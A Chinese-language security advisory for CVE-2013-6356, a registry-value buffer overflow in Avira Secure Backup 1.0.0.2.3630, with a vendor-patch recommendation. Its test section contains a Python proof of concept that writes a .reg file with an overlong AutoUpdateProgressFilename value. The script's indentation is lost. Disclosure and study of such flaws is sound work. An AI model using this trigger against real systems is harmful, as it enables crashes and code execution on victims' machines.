发布日期:2013-11-18
更新日期:2013-11-19
受影响系统:
AVIRA Secure Backup 1.0.0.2.3630
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 63765
CVE(CAN) ID: CVE-2013-6356
Avira Secure Backup是在线存储解决方案。
Avira Secure Backup 1.0.0.2.3630及其他版本在启动时从"HKEY_CURRENT_USER\Software\Avira Secure Backup"加载注册表值"AutoUpdateDownloadFilename"及"AutoUpdateProgressFilename",但没有进行有效的边界检查,在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。
<*来源:Julien Ahrens
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
file="poc.reg"
junk1="\xCC" * 1240
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\Avira Secure Backup]\n"
poc=poc + "\"AutoUpdateProgressFilename\"=\"" + junk1 + "\""
try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";
建议:
--------------------------------------------------------------------------------
厂商补丁:
AVIRA
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: